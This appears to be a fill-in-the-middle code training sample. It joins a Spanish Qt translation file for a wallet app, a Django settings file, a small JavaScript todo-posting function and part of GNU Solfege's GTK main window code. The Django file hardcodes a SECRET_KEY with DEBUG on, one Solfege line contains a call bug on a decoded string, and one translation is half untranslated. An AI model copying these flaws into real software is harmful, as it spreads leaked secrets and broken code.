<source>Username for JSON-RPC connections</source>
<translation>Usuario para las conexiones JSON-RPC
</translation>
</message>
<message>
<source>Warning</source>
<translation>Atención</translation>
</message>
<message>
<source>wallet.dat corrupt, salvage failed</source>
        <translation>wallet.dat corrupto, falló la recuperación de datos</translation>
</message>
<message>
<source>Password for JSON-RPC connections</source>
<translation>Contraseña para las conexiones JSON-RPC
</translation>
</message>
<message>
<source>Upgrade wallet to latest format</source>
<translation>Actualizar billetera al formato actual</translation>
</message>
<message>
<source>Rescan the block chain for missing wallet transactions</source>
<translation>Rescanea la cadena de bloques para transacciones perdidas de la cartera
</translation>
</message>
<message>
<source>Use OpenSSL (https) for JSON-RPC connections</source>
<translation>Usa OpenSSL (https) para las conexiones JSON-RPC
</translation>
</message>
<message>
<source>This help message</source>
<translation>Este mensaje de ayuda
</translation>
</message>
<message>
<source>Allow DNS lookups for -addnode, -seednode and -connect</source>
<translation>Permite búsqueda DNS para addnode y connect
</translation>
</message>
<message>
<source>Loading addresses...</source>
<translation>Cargando direcciónes...</translation>
</message>
<message>
<source>Error loading wallet.dat: Wallet corrupted</source>
<translation>Error cargando wallet.dat: Billetera corrupta</translation>
</message>
<message>
<source>Error loading wallet.dat</source>
<translation>Error cargando wallet.dat</translation>
</message>
<message>
<source>Invalid -proxy address: '%s'</source>
<translation>Dirección -proxy invalida: '%s'</translation>
</message>
<message>
<source>Invalid amount for -paytxfee=<amount>: '%s'</source>
<translation>Cantidad inválida para -paytxfee=<amount>: '%s'</translation>
</message>
<message>
<source>Insufficient funds</source>
<translation>Fondos insuficientes</translation>
</message>
<message>
<source>Loading block index...</source>
<translation>Cargando el index de bloques...</translation>
</message>
<message>
<source>Add a node to connect to and attempt to keep the connection open</source>
<translation>Agrega un nodo para conectarse and attempt to keep the connection open</translation>
</message>
<message>
<source>Loading wallet...</source>
<translation>Cargando cartera...</translation>
</message>
<message>
<source>Rescanning...</source>
<translation>Rescaneando...</translation>
</message>
<message>
<source>Done loading</source>
<translation>Carga completa</translation>
</message>
<message>
<source>Error</source>
<translation>Error</translation>
</message>
</context>
</TS><|fim▁end|> | </context>
<context> |
<|file_name|>settings.py<|end_file_name|><|fim▁begin|>"""
Django settings for keyman project.
Generated by 'django-admin startproject' using Django 1.11.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$-2ijwgs8-3i*r#j@1ian5xrp+17)fz)%cdjjhwa#4x&%lk7v@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'keys',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'keyman.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'keyman.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',<|fim▁hole|>
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'<|fim▁end|> | 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
} |
<|file_name|>postTodo.js<|end_file_name|><|fim▁begin|>function postTodo ({input, state, output, services}) {
const todo = state.get(`app.todos.${input.ref}`)
services.http.post('/api/todos', todo)
.then(output.success)
.catch(output.error)
}<|fim▁hole|>postTodo.outputs = ['success', 'error']
export default postTodo<|fim▁end|> |
postTodo.async = true |
<|file_name|>mainwin.py<|end_file_name|><|fim▁begin|># vim: set fileencoding=utf-8 :
# GNU Solfege - free ear training software
# Copyright (C) 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2011 Tom Cato Amundsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import solfege
import webbrowser
import textwrap
# We move x-www-browser to the end of the list because on my
# debian etch system, the browser does will freeze solfege until
# I close the browser window.
# Move "x-www-browser" to the end of webbrowser's fallback list: on some
# systems (e.g. Debian etch) it blocks Solfege until the browser window is
# closed, so every other registered browser should be tried first.
try:
    i = webbrowser._tryorder.index("x-www-browser")
    webbrowser._tryorder.append(webbrowser._tryorder[i])
    del webbrowser._tryorder[i]
except ValueError:
    # "x-www-browser" is not registered on this system; nothing to do.
    pass
import sys
import traceback
import locale
import os
import urllib
import shutil
try:
from pyalsa import alsaseq
except ImportError:
alsaseq = None
from solfege import winlang
from solfege import buildinfo
from solfege.esel import FrontPage, TestsView, SearchView
from gi.repository import Gtk
from gi.repository import Gdk
from solfege import utils
from solfege import i18n
class SplashWin(Gtk.Window):
    """Borderless popup shown while the application is starting up."""
    def __init__(self):
        Gtk.Window.__init__(self, Gtk.WindowType.POPUP)
        self.set_position(Gtk.WindowPosition.CENTER)
        self.set_resizable(True)
        outer = Gtk.Frame()
        outer.set_shadow_type(Gtk.ShadowType.OUT)
        self.add(outer)
        content = Gtk.VBox()
        content.set_border_width(20)
        outer.add(content)
        heading = Gtk.Label(label=_("Starting GNU Solfege %s") % buildinfo.VERSION_STRING)
        heading.set_name("Heading1")
        content.pack_start(heading, True, True, 0)
        homepage = Gtk.Label(label="http://www.solfege.org")
        content.pack_start(homepage, True, True, 0)
        # Updated by show_progress() as startup work proceeds.
        self.g_infolabel = Gtk.Label(label='')
        content.pack_start(self.g_infolabel, True, True, 0)
        self.show_all()
    def show_progress(self, txt):
        """Display *txt* in the splash window and force a redraw."""
        self.g_infolabel.set_text(txt)
        # Drain pending GTK events so the new text is painted immediately,
        # even though the main loop is not running yet.
        while Gtk.events_pending():
            Gtk.main_iteration()
from solfege.configwindow import ConfigWindow
from solfege.profilemanager import ChangeProfileDialog
from solfege import gu
from solfege import cfg
from solfege import mpd
from solfege import lessonfile
from solfege import download_pyalsa
from solfege import statistics
from solfege import stock
from solfege import frontpage
from solfege import fpeditor
from solfege.trainingsetdlg import TrainingSetDialog
from solfege.practisesheetdlg import PractiseSheetDialog
from solfege import filesystem
class MusicViewerWindow(Gtk.Dialog):
    """Dialog that shows rendered music notation with a Close button."""
    def __init__(self):
        Gtk.Dialog.__init__(self)
        self.set_default_size(500, 300)
        self.g_music_displayer = mpd.MusicDisplayer()
        self.vbox.pack_start(self.g_music_displayer, True, True, 0)
        close_button = gu.bButton(self.action_area, _("Close"), solfege.win.close_musicviewer)
        close_button.grab_focus()
        self.connect('destroy', solfege.win.close_musicviewer)
        self.show_all()
    def display_music(self, music):
        """Render *music* using the feta font size from the user config."""
        size = cfg.get_int('config/feta_font_size=20')
        self.g_music_displayer.display(music, size)
class MainWin(Gtk.Window, cfg.ConfigUtils):
    """Application main window: menu bar plus a stack of exercise views."""
    # Front page used when none is configured or the configured one fails.
    default_front_page = os.path.join(lessonfile.exercises_dir, 'learningtree.txt')
    # Alternative front page; only honoured when running with --debug.
    debug_front_page = os.path.join(lessonfile.exercises_dir, 'debugtree.txt')
    def __init__(self, options, datadir):
        """
        Build the main window: icon factory, config hookup, menu bar and
        the box that will hold the exercise views.

        options -- parsed command line options (currently unused here)
        datadir -- directory the icon factory loads its images from
        """
        Gtk.Window.__init__(self, Gtk.WindowType.TOPLEVEL)
        self._vbox = Gtk.VBox()
        self._vbox.show()
        self.add(self._vbox)
        stock.SolfegeIconFactory(self, datadir)
        Gtk.Settings.get_default().set_property('gtk-button-images', True)
        # Call ConfigUtils.__init__ through the class dict because
        # Gtk.Window.__init__ has already run and super() is not used here.
        cfg.ConfigUtils.__dict__['__init__'](self, 'mainwin')
        self.set_resizable(self.get_bool('gui/mainwin_user_resizeable'))
        self.add_watch('gui/mainwin_user_resizeable', lambda s: self.set_resizable(self.get_bool('gui/mainwin_user_resizeable')))
        self.connect('delete-event', self.quit_program)
        self.connect('key_press_event', self.on_key_press_event)
        self.g_about_window = None
        self.m_exercise = None
        # Name of the currently visible view; key into self.box_dict.
        self.m_viewer = None
        # Maps view name -> widget; maintained by add_view()/show_view().
        self.box_dict = {}
        self.g_config_window = None
        self.g_path_info_dlg = None
        self.g_musicviewer_window = None
        self.m_history = []
        self.g_ui_manager = Gtk.UIManager()
        # NOTE(review): two action groups, presumably so everything except
        # quitting can be disabled in some modes -- confirm against callers.
        self.m_action_groups = {
            'Exit': Gtk.ActionGroup('Exit'),
            'NotExit': Gtk.ActionGroup('NotExit'),
        }
        for a in self.m_action_groups.values():
            self.g_ui_manager.insert_action_group(a, 1)
        self.setup_menu()
        self.main_box = Gtk.VBox()
        self.main_box.show()
        self._vbox.pack_start(self.main_box, True, True, 0)
def get_view(self):
"""
Return the view that is currently visible.
Raise KeyError if no view has yet been added.
"""
return self.box_dict[self.m_viewer]
def add_view(self, view, name):
"""
Hide the current view.
Add and view the new view.
"""
assert name not in self.box_dict
if self.m_viewer:
self.get_view().hide()
self.box_dict[name] = view
self.main_box.pack_start(self.box_dict[name], True, True, 0)
self.box_dict[name].show()
self.m_viewer = name
def show_view(self, name):
"""
Return False if the view does not exist.
Hide the current visible view, show the view named 'name' and
return True.
"""
if name not in self.box_dict:
return False
self.get_view().hide()
self.m_viewer = name
self.box_dict[name].show()
return True
def change_frontpage(self, filename):
"""
Change to a different frontpage file.
"""
self.set_string('app/frontpage', filename)
self.load_frontpage()
def load_frontpage(self):
"""
Load the front page file set in the config database into
solfege.app.m_frontpage_data
"""
filename = self.get_string("app/frontpage")
if filename == self.debug_front_page and not solfege.app.m_options.debug:
self.set_string("app/frontpage", self.default_front_page)
filename = self.default_front_page
if not os.path.isfile(filename):
filename = self.default_front_page
try:
solfege.app.m_frontpage_data = frontpage.load_tree(filename)
except Exception, e:
if solfege.splash_win:
solfege.splash_win.hide()
solfege.app.m_frontpage_data = frontpage.load_tree(self.default_front_page)
self.set_string('app/frontpage', self.default_front_page)
gu.dialog_ok(_("Loading front page '%s' failed. Using default page." % filename),
secondary_text = "\n".join(traceback.format_exception(*sys.exc_info())))
if solfege.splash_win:
solfege.splash_win.show()
self.display_frontpage()
    def setup_menu(self):
        """
        Populate the two action groups, build the menu bar from ui.xml and
        pack it (inside a handle box) at the top of the window.
        """
        self.m_action_groups['Exit'].add_actions([
            ('FileMenu', None, _('_File')),
            ('AppQuit', 'gtk-quit', None, None, None, self.quit_program),
        ])
        self.m_action_groups['NotExit'].add_actions([
            ('TheoryMenu', None, _('The_ory')),
            ('FrontPagesMenu', None, _('Sele_ct Front Page')),
            ('TheoryIntervals', None, _('_Intervals'), None, None,
                lambda o: solfege.app.handle_href('theory-intervals.html')),
            ('TreeEditor', None, _('_Edit Front Page'), None, None,
                self.do_tree_editor),
            ('ExportTrainingSet', None, _(u'E_xport Exercises to Audio Files…'), None, None,
                self.new_training_set_editor),
            ('EditPractiseSheet', None, _(u'Ear Training Test Pri_ntout…'), None, None,
                self.new_practisesheet_editor),
            ('ProfileManager', None, _("Profile _Manager"), None, None,
                self.open_profile_manager),
            ('OpenPreferencesWindow', 'gtk-preferences', None, '<ctrl>F12', None,
                self.open_preferences_window),
            ('HelpMenu', None, _('_Help')),
            ('Search', 'gtk-search', _('_Search Exercises'), '<ctrl>F', None,
                self.on_search_all_exercises),
            ('FrontPage', None, _('_Front Page'), 'F5', None,
                lambda w: self.display_frontpage()),
            ('TestsPage', None, _('_Tests Page'), 'F6', None,
                lambda w: self.display_testpage()),
            ('RecentExercises', None, _('_Recent Exercises'), 'F7', None,
                self.display_recent_exercises),
            ('RecentTests', None, _('_Recent Tests'), 'F8', None,
                self.display_recent_tests),
            ('UserExercises', None, _('_User Exercises'), 'F9', None,
                self.display_user_exercises),
            ('SetupPyAlsa', None, _("Download and compile ALSA modules"), None, None, self.setup_pyalsa),
            ('HelpHelp', 'gtk-help', _('_Help on the current exercise'), 'F1', None,
                lambda o: solfege.app.please_help_me()),
            ('HelpTheory', None, _('_Music theory on the current exercise'), 'F3', None, lambda o: solfege.app.show_exercise_theory()),
            ('HelpIndex', None, _('_User manual'), None, None,
                lambda o: solfege.app.handle_href('index.html')),
            ('HelpShowPathInfo', None, _('_File locations'), None,
                None, self.show_path_info),
            ('HelpOnline', None, _('_Mailing lists, web page etc.'), None, None,
                lambda o: solfege.app.handle_href('online-resources.html')),
            ('HelpDonate', None, _('_Donate'), None, None,
                lambda o: solfege.app.handle_href('http://www.solfege.org/donate/')),
            ('HelpReportingBugs', None, _('Reporting _bugs'), None, None,
                lambda o: solfege.app.handle_href('bug-reporting.html')),
            ('HelpAbout', 'gtk-about', None, None, None, self.show_about_window),
            ('ShowBugReports', None, _('_See your bug reports'), None, None,
                self.show_bug_reports),
        ])
        self.g_ui_manager.add_ui_from_file("ui.xml")
        self.add_accel_group(self.g_ui_manager.get_accel_group())
        hdlbox = Gtk.HandleBox()
        hdlbox.show()
        hdlbox.add(self.g_ui_manager.get_widget('/Menubar'))
        self._vbox.pack_start(hdlbox, False, False, 0)
        # Merge id for the per-exercise Help entries; managed by
        # show_help_on_current()/hide_help_on_current().
        self.m_help_on_current_merge_id = None
    def create_frontpage_menu(self):
        """
        Create, or update if already existing, the submenu that let the
        user choose which front page file to display.
        """
        # Remove the previously merged menu items before rebuilding.
        if self.m_frontpage_merge_id:
            self.g_ui_manager.remove_ui(self.m_frontpage_merge_id)
        actions = []
        old_dir = None
        s = "<menubar name='Menubar'><menu action='FileMenu'><menu action='FrontPagesMenu'>"
        for fn in frontpage.get_front_pages_list(solfege.app.m_options.debug):
            if solfege.splash_win:
                solfege.splash_win.show_progress(fn)
            if not frontpage.may_be_frontpage(fn):
                continue
            # Probe the info cache; a TypeError means the file has no
            # usable title, so it is skipped.
            try:
                title = lessonfile.infocache.frontpage.get(fn, 'title')
            except TypeError:
                continue
            # Insert a separator each time we enter a new directory.
            cur_dir = os.path.split(fn)[0]
            if old_dir != cur_dir:
                s += '<separator name="sep@%s"/>' % fn
                old_dir = cur_dir
            s += "<menuitem action='%s'/>\n" % fn
            if not self.m_action_groups['NotExit'].get_action(fn):
                # f=fn binds the current value; a plain closure would see
                # only the last fn of the loop (late binding).
                actions.append((fn, None, lessonfile.infocache.frontpage.get(fn, 'title'), None, fn,
                    lambda o, f=fn: self.change_frontpage(f)))
            else:
                # Action already exists from a previous build; just
                # refresh its label in case the title changed.
                action = self.m_action_groups['NotExit'].get_action(fn)
                action.props.label = lessonfile.infocache.frontpage.get(fn, 'title')
        s += "</menu></menu></menubar>"
        self.m_action_groups['NotExit'].add_actions(actions)
        self.m_frontpage_merge_id = self.g_ui_manager.add_ui_from_string(s)
    def show_help_on_current(self):
        """
        Show the menu entries for the exercise help and music theory
        pages on the Help menu.
        """
        # Already merged; nothing to do.
        if self.m_help_on_current_merge_id:
            return
        self.m_help_on_current_merge_id = self.g_ui_manager.add_ui_from_string("""
<menubar name='Menubar'>
 <menu action='HelpMenu'>
  <placeholder name='PerExerciseHelp'>
   <menuitem position='top' action='HelpHelp' />
   <menuitem action='HelpTheory' />
  </placeholder>
 </menu>
</menubar>""")
def hide_help_on_current(self):
"""
Hide the menu entries for the help and music theory pages on the
Help menu.
"""
if not self.m_help_on_current_merge_id:
return
self.g_ui_manager.remove_ui(self.m_help_on_current_merge_id)
self.m_help_on_current_merge_id = None
def show_bug_reports(self, *v):
m = Gtk.Dialog(_("Question"), self, 0)
m.add_button(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)
m.add_button(Gtk.STOCK_OK, Gtk.ResponseType.OK)
vbox = Gtk.VBox()
m.vbox.pack_start(vbox, False, False, 0)
vbox.set_spacing(18)
vbox.set_border_width(12)
l = Gtk.Label(label=_("Please enter the email used when you submitted the bugs:"))
vbox.pack_start(l, False, False, 0)
self.g_email = Gtk.Entry()
m.action_area.get_children()[0].grab_default()
self.g_email.set_activates_default(True)
vbox.pack_start(self.g_email, False, False, 0)
m.show_all()
ret = m.run()
m.destroy()
if ret == Gtk.ResponseType.OK:
params = urllib.urlencode({
'pagename': 'SITS-Incoming/SearchBugs',
'q': 'SITS-Incoming/"Submitter: %s"' % utils.mangle_email(self.g_email.get_text().decode("utf-8")()),
})
try:
webbrowser.open_new("http://www.solfege.org?%s" % params)
except Exception, e:
self.display_error_message2(_("Error opening web browser"), str(e))
    def display_error_message2(self, text, secondary_text):
        """
        Show a modal error dialog with *text* as the primary message and
        *secondary_text* below it.

        This is the new version of display_error_message, and it will
        eventually replace the old.
        """
        # Hide the splash screen while the dialog is up so it does not
        # obscure (or get obscured by) the error message.
        if solfege.splash_win and solfege.splash_win.props.visible:
            solfege.splash_win.hide()
            reshow_splash = True
        else:
            reshow_splash = False
        # Decode byte strings with 'replace' so a bad encoding can never
        # raise while we are trying to report another error.
        if not isinstance(text, unicode):
            text = text.decode(locale.getpreferredencoding(), 'replace')
        if not isinstance(secondary_text, unicode):
            secondary_text = secondary_text.decode(locale.getpreferredencoding(), 'replace')
        m = Gtk.MessageDialog(None, Gtk.DialogFlags.MODAL, Gtk.MessageType.ERROR,
                Gtk.ButtonsType.CLOSE, text)
        if secondary_text:
            m.format_secondary_text(secondary_text)
        m.run()
        m.destroy()
        if reshow_splash:
            solfege.splash_win.show()
            while Gtk.events_pending():
                Gtk.main_iteration()
    def display_error_message(self, msg, title=None, secondary_text=None):
        """
        Show a modal error dialog displaying *msg* (markup-escaped).

        Older variant kept for existing callers; display_error_message2
        is the intended replacement.
        """
        # Hide the splash screen while the dialog is up.
        if solfege.splash_win and solfege.splash_win.props.visible:
            solfege.splash_win.hide()
            reshow_splash = True
        else:
            reshow_splash = False
        # Decode with 'replace' so reporting an error cannot itself raise.
        if not isinstance(msg, unicode):
            msg = msg.decode(locale.getpreferredencoding(), 'replace')
        m = Gtk.MessageDialog(None, Gtk.DialogFlags.MODAL, Gtk.MessageType.ERROR,
                Gtk.ButtonsType.CLOSE, None)
        m.set_markup(gu.escape(msg))
        if title:
            m.set_title(title)
        if secondary_text:
            m.format_secondary_text(secondary_text)
        m.run()
        m.destroy()
        if reshow_splash:
            solfege.splash_win.show()
            while Gtk.events_pending():
                Gtk.main_iteration()
    def show_path_info(self, w):
        """
        Show (creating on first use) a dialog listing the locations of
        the application's data, config and documentation files.
        """
        if not self.g_path_info_dlg:
            self.g_path_info_dlg = Gtk.Dialog(_("_File locations").replace("_", ""), self,
                buttons=(Gtk.STOCK_OK, Gtk.ResponseType.ACCEPT))
            sc = Gtk.ScrolledWindow()
            sc.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.NEVER)
            self.g_path_info_dlg.vbox.pack_start(sc, True, True, 0)
            #
            vbox = gu.hig_dlg_vbox()
            sc.add_with_viewport(vbox)
            box1, box2 = gu.hig_category_vbox(_("_File locations").replace("_", ""))
            vbox.pack_start(box1, True, True, 0)
            sizegroup = Gtk.SizeGroup(Gtk.SizeGroupMode.HORIZONTAL)
            # statistics.sqlite
            # win32 solfegerc
            # win32 langenviron.txt
            box2.pack_start(gu.hig_label_widget(_("Solfege application data:"), Gtk.Label(label=filesystem.app_data()), sizegroup), False, False, 0)
            box2.pack_start(gu.hig_label_widget(_("Solfege user data:"), Gtk.Label(label=filesystem.user_data()), sizegroup), False, False, 0)
            box2.pack_start(gu.hig_label_widget(_("Solfege config file:"), Gtk.Label(label=filesystem.rcfile()), sizegroup), False, False, 0)
            box2.pack_start(gu.hig_label_widget(_("Solfege installation directory:"), Gtk.Label(label=os.getcwdu()), sizegroup), False, False, 0)
            box2.pack_start(gu.hig_label_widget(_("User manual in HTML format:"), Gtk.Label(label=os.path.join(os.getcwdu(), "help")), sizegroup), False, False, 0)
            box2.pack_start(gu.hig_label_widget("gtk:", Gtk.Label(label=str(Gtk)), sizegroup), False, False, 0)
            box2.pack_start(gu.hig_label_widget("pyalsa:", Gtk.Label(label=str(alsaseq)), sizegroup), False, False, 0)
            box2.pack_start(gu.hig_label_widget("PYTHONHOME", Gtk.Label(os.environ.get('PYTHONHOME', 'Not defined')), sizegroup), False, False, 0)
            self.g_path_info_dlg.show_all()
            # Hide instead of destroy so the dialog can be reopened.
            def f(*w):
                self.g_path_info_dlg.hide()
                return True
            self.g_path_info_dlg.connect('response', f)
            self.g_path_info_dlg.connect('delete-event', f)
            # Cap the width at 90% of the screen.
            sc.set_size_request(min(vbox.size_request().width + gu.SPACE_LARGE * 2,
                Gdk.Screen.width() * 0.9),
                vbox.size_request().height)
    def setup_pyalsa(self, widget):
        """Menu callback: download and build the pyalsa modules."""
        download_pyalsa.download()
    def show_about_window(self, widget):
        """Run the modal About dialog with credits and license text."""
        pixbuf = self.render_icon('solfege-icon', Gtk.IconSize.DIALOG)
        a = self.g_about_window = Gtk.AboutDialog()
        a.set_program_name("GNU Solfege")
        a.set_logo(pixbuf)
        a.set_website("http://www.solfege.org")
        a.set_version(buildinfo.VERSION_STRING)
        a.set_copyright("Copyright (C) 2013 Tom Cato Amundsen and others")
        a.set_license("\n".join((solfege.application.solfege_copyright, solfege.application.warranty)))
        # Using set_license_type causes the app to print warnings.
        #a.set_license_type(Gtk.License.GPL_3_0)
        a.set_authors(["Tom Cato Amundsen",
            'Giovanni Chierico %s' % _("(some lessonfiles)"),
            'Michael Becker %s' % _("(some lessonfiles)"),
            'Joe Lee %s' % _("(sound code for the MS Windows port)"),
            'Steve Lee %s' % _("(ported winmidi.c to gcc)"),
            'Thibaus Cousin %s' % _("(spec file for SuSE 8.2)"),
            'David Coe %s' %_("(spec file cleanup)"),
            'David Petrou %s' % _("(testing and portability fixes for FreeBSD)"),
            'Han-Wen Nienhuys %s' % _("(the music font from Lilypond)"),
            'Jan Nieuwenhuizen %s' % _("(the music font from Lilypond)"),
            'Davide Bonetti %s' % _("(scale exercises)"),
            ])
        a.set_documenters(["Tom Cato Amundsen",
            "Tom Eykens",
            ])
        # If "SOLFEGETRANSLATORS" comes back untranslated there are no
        # translator credits for the current locale.
        if _("SOLFEGETRANSLATORS") == 'SOLFEGETRANSLATORS':
            a.set_translator_credits(None)
        else:
            a.set_translator_credits(_("SOLFEGETRANSLATORS"))
        self.g_about_window.run()
        self.g_about_window.destroy()
    def do_tree_editor(self, *v):
        """
        Open a front page editor editing the front page file currently
        selected in the app/frontpage config variable.
        """
        fpeditor.Editor.edit_file(self.get_string("app/frontpage"))
    def post_constructor(self):
        """
        Finish window setup after construction: build the front page menu,
        report sound-init failures, run one-time data migrations for old
        Solfege versions and warn about broken locale setup or old-format
        front page files.
        """
        self.m_frontpage_merge_id = None
        self.create_frontpage_menu()
        self.g_ui_manager.add_ui_from_file("help-menu.xml")
        # The pyalsa download helper is only relevant on Linux.
        if sys.platform != 'linux2':
            self.g_ui_manager.get_widget('/Menubar/HelpMenu/SetupPyAlsa').hide()
        if solfege.app.m_sound_init_exception is not None:
            if solfege.splash_win:
                solfege.splash_win.destroy()
                solfege.splash_win = None
            solfege.app.display_sound_init_error_message(solfege.app.m_sound_init_exception)
        # MIGRATION 3.9.0
        if sys.platform == "win32" \
            and os.path.exists(os.path.join(filesystem.get_home_dir(), "lessonfiles")) \
            and not os.path.exists(filesystem.user_lessonfiles()):
            if solfege.splash_win:
                solfege.splash_win.hide()
            do_move = gu.dialog_yesno(_('In Solfege 3.9.0, the location where Solfege look for lesson files you have created was changed. The files has to be moved from "%(old)s" and into the folder "%(gnu)s" in your "%(doc)s" folder.\nMay I move the files automatically for you now?' % {
                'doc': os.path.split(os.path.split(filesystem.user_data())[0])[1],
                'gnu': os.path.join(filesystem.appname, 'lessonfiles'),
                'old': os.path.join(filesystem.get_home_dir(), "lessonfiles"),
                }), parent=self)
            if do_move:
                try:
                    os.makedirs(filesystem.user_data())
                    shutil.copytree(os.path.join(filesystem.get_home_dir(), "lessonfiles"),
                        os.path.join(filesystem.user_data(), "lessonfiles"))
                except (OSError, shutil.Error), e:
                    gu.dialog_ok(_("Error while copying directory:\n%s" % e))
                else:
                    gu.dialog_ok(_("Files copied. The old files has been left behind. Please delete them when you have verified that all files was copied correctly."))
            if solfege.splash_win:
                solfege.splash_win.show()
        # MIGRATION 3.9.3 when we added langenviron.bat and in 3.11
        # we migrated to langenviron.txt because we does not use cmd.exe
        if sys.platform == 'win32' and winlang.win32_get_langenviron() != self.get_string('app/lc_messages'):
            gu.dialog_ok(_("Migrated old language setup. You might have to restart the program all translated messages to show up."))
            winlang.win32_put_langenviron(self.get_string('app/lc_messages'))
        # MIGRATION 3.11.1: earlier editors would create new learning trees
        # below app_data() instead of user_data().
        if (sys.platform == "win32" and
            os.path.exists(os.path.join(filesystem.app_data(),
                "learningtrees"))):
            if not os.path.exists(os.path.join(filesystem.user_data(), "learningtrees")):
                os.makedirs(os.path.join(filesystem.user_data(), "learningtrees"))
            for fn in os.listdir(os.path.join(filesystem.app_data(), "learningtrees")):
                if not os.path.exists(os.path.join(filesystem.user_data(), "learningtrees", fn)):
                    shutil.move(os.path.join(filesystem.app_data(), "learningtrees", fn),
                        os.path.join(filesystem.user_data(), "learningtrees"))
                else:
                    # We add the .bak extension if the file already exists.
                    shutil.move(os.path.join(filesystem.app_data(), "learningtrees", fn),
                        os.path.join(filesystem.user_data(), "learningtrees", u"%s.bak" % fn))
            os.rmdir(os.path.join(os.path.join(filesystem.app_data(), "learningtrees")))
        # Rebuild the front page submenu each time it is opened, so newly
        # added files show up.
        item = self.g_ui_manager.get_widget("/Menubar/FileMenu/FrontPagesMenu")
        item.connect('activate', lambda s: self.create_frontpage_menu())
        # i18n.locale_setup_failed only exists if locale setup went wrong.
        try:
            i18n.locale_setup_failed
            print >> sys.stderr, "\n".join(textwrap.wrap("Translations are disabled because your locale settings are broken. This is not a bug in GNU Solfege, so don't report it. The README file distributed with the program has some more details."))
        except AttributeError:
            pass
        for filename in lessonfile.infocache.frontpage.iter_old_format_files():
            gu.dialog_ok(_("Cannot load front page file"), None,
                _(u"The file «%s» is saved in an old file format. The file can be converted by editing and saving it with an older version of Solfege. Versions from 3.16.0 to 3.20.4 should do the job.") % filename)
def activate_exercise(self, module, urlobj=None):
self.show_view(module)
# We need this test because not all exercises use a notebook.
if self.get_view().g_notebook:
if urlobj and urlobj.action in ['practise', 'config', 'statistics']:
self.get_view().g_notebook.set_current_page(
['practise', 'config', 'statistics'].index(urlobj.action))
else:
self.get_view().g_notebook.set_current_page(0)
self.set_title("Solfege - " + self.get_view().m_t.m_P.header.title)
def display_docfile(self, fn):
"""
Display the HTML file named by fn in the help browser window.
"""
for lang in solfege.app.m_userman_language, "C":
filename = os.path.join(os.getcwdu(), u"help", lang, fn)
if os.path.isfile(filename):
break
try:
webbrowser.open(filename)
except Exception, e:
self.display_error_message2(_("Error opening web browser"), str(e))
    def display_user_exercises(self, w):
        """
        Build and display a generated front page listing the user's own
        lesson files, grouped into one link list per directory.
        """
        col = frontpage.Column()
        page = frontpage.Page(_('User exercises'), col)
        curdir = None
        linklist = None
        for filename in lessonfile.infocache.iter_user_files(only_user_collection=True):
            dir, fn = os.path.split(filename)
            # Start a new link list whenever the directory changes.
            if dir != curdir:
                curdir = dir
                linklist = frontpage.LinkList(dir)
                col.append(linklist)
            linklist.append(filename)
        if os.path.isdir(filesystem.user_lessonfiles()):
            linklist = None
            col.append(frontpage.Paragraph(_('You really should move the following directory to a directory below <span font_family="monospace">%s</span>. Future versions of GNU Solfege will not display files in the old location. The user manual have details on where to place the files.') % os.path.join(filesystem.user_data(), u'exercises')))
            # Added just to be nice with people not moving their files from
            # pre 3.15.3 location:
            for filename in os.listdir(filesystem.user_lessonfiles()):
                if not linklist:
                    linklist = frontpage.LinkList(filesystem.user_lessonfiles())
                linklist.append(os.path.join(filesystem.user_lessonfiles(), filename))
            # only display the linklist if there are any files.
            if linklist:
                col.append(linklist)
        self.display_frontpage(page)
    def display_recent_exercises(self, w):
        """Show a front page listing the 8 most recently used exercises."""
        data = frontpage.Page(_('Recent exercises'),
